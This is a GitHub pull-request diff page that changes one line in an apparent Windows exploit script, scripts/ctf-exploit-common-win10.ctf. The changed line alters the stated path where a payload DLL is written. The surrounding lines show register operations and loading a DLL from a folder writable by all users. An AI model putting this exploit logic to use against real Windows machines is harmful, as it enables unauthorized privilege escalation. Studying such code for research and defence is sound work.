Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion scripts/ctf-exploit-common-win10.ctf
Original file line number Diff line number Diff line change
Expand Up @@ -417,7 +417,7 @@ sub r1 1
and r1 0xff
repeat r1 callstub 0 0 r3

print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
print Writing in the payload path "C:\TEMP\EXPLOIT.DLL"...

# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
set r2 0x5c504d45545c3a43
Expand Down